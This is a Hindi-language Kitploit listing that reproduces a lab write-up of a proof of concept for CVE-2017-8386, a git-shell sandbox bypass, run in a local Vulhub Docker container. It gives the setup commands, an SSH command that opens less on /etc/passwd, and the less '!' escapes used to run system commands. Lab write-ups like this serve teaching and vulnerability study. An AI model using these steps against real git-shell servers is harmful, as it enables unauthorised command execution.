Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
WHS3_vulhub — CVE-2017-8386 Git-Shell सैंडबॉक्स बाईपास कमज़ोरी के लिए PoC | Kitploit
उपकरण/GitHubGitHub/suz1n/whs3_vulhub
कंटेनर सुरक्षाभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubsuz1n/whs3_vulhub

WHS3_vulhub

CVE-2017-8386 Git-Shell सैंडबॉक्स बाईपास कमज़ोरी के लिए PoC

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2017-8386: git-shell सैंडबॉक्स बाईपास से RCE PoC

정수진(@suz1n)

अवलोकन

Git-shell SSH के माध्यम से केवल सीमित git कमांड की अनुमति देने वाला वातावरण प्रदान करता है। लेकिन git-shell के कुछ संस्करणों (जैसे 2.12.2) में less कमांड का दुरुपयोग करके सैंडबॉक्स को बाईपास करने और सिस्टम कमांड निष्पादित करने की कमजोरी (CVE-2017-8386) मौजूद है।

यह रिपोर्ट उस कमजोरी के लिए PoC का संचालन और प्रक्रिया का सारांश है।

पर्यावरण सेटअप

उपयोग किए गए उपकरण और संस्करण

  • Docker: 24.0.7
  • Docker-Compose: v2.34.0
  • Host OS: macOS
  • Target OS: Ubuntu 16.04 (कंटेनर के अंदर)
  • Git Version: 2.12.2
  • SSH Server

Vulhub रिपॉजिटरी क्लोन करें

git clone https://github.com/phith0n/vulhub.git

cd vulhub/git/CVE-2017-8386/ Image1

docker-compose.yml और Dockerfile कॉन्फ़िगरेशन

root@kitploit:~
• Ubuntu 16.04 बेस इमेज
• Git 2.12.2 स्रोत से स्थापित
• OpenSSH सर्वर स्थापित और चलाएं
• git-shell वातावरण सेटअप (git उपयोगकर्ता बनाएं)

कंटेनर बनाना और चलाना

docker-compose build

docker-compose up -d

docker ps

root@kitploit:~
• कंटेनर चल रहा है इसकी पुष्टि (git-shell-cve-2017-8386)

Image2

SSH कुंजी पंजीकरण और वातावरण सेटअप

root@kitploit:~
1. स्थानीय रूप से id_rsa.pub बनाएं और कॉपी करें
2. कंटेनर के अंदर जाएं और git उपयोगकर्ता में स्विच करें
3. authorized_keys पंजीकृत करें

docker exec -it git-shell-cve-2017-8386 /bin/bash

chsh -s /bin/bash git

su git

mkdir -p ~/.ssh

chmod 700 ~/.ssh

touch ~/.ssh/authorized_keys

chmod 600 ~/.ssh/authorized_keys

vim ~/.ssh/authorized_keys

Image3

अतिरिक्त पैकेज स्थापित करना

apt update

apt install less -y

apt install man-db -y

root@kitploit:~
• PoC संचालन के लिए less, man पैकेज स्थापित किए गए

PoC प्रक्रिया

सामान्य SSH कनेक्शन

ssh -p 3322 -i id_rsa -t [email protected] "less /etc/passwd"

• less स्क्रीन में प्रवेश सफल

• ! कमांड के माध्यम से सिस्टम कमांड निष्पादित कर सकते हैं

कमांड निष्पादन (सैंडबॉक्स बाईपास)

• !id -> उपयोगकर्ता ID, समूह ID आउटपुट first_execute.png

• !whoami -> वर्तमान उपयोगकर्ता (git)

• !uname -a -> सिस्टम कर्नेल जानकारी आउटपुट

• !ls /home/git -> git होम डायरेक्टरी फ़ाइल सूची आउटपुट

विश्लेषण

root@kitploit:~
• git-shell वातावरण में उपयोगकर्ता को सिस्टम कमांड चलाने से प्रतिबंधित किया जाता है।
• लेकिन `git-upload-archive --help` कमांड के माध्यम से आंतरिक रूप से less कॉल संभव है।
• less कमांड ! फ़ंक्शन के माध्यम से सिस्टम शेल कमांड निष्पादन का समर्थन करता है।
• परिणामस्वरूप, git-shell सैंडबॉक्स को बायपास करके मनमाना कमांड निष्पादन संभव है।

संदर्भ

• Insinuator ब्लॉग: https://insinuator.net/2017/05/git-shell-bypass-by-abusing-less-cve-2017-8386/

• Vulhub GitHub रिपॉजिटरी: https://github.com/phith0n/vulhub

GitHub रिपॉजिटरी लिंक

https://github.com/suz1n/WHS3_vulhub

टूल डाउनलोड करें